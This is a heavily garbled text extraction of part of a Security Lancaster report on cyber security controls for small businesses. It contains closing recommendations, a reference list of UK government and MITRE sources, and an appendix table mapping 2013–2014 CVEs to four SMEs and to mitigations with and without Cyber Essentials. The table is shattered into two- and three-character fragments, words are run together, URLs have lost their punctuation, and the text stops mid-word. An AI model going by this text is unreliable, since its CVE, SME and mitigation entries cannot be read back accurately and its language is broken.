1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
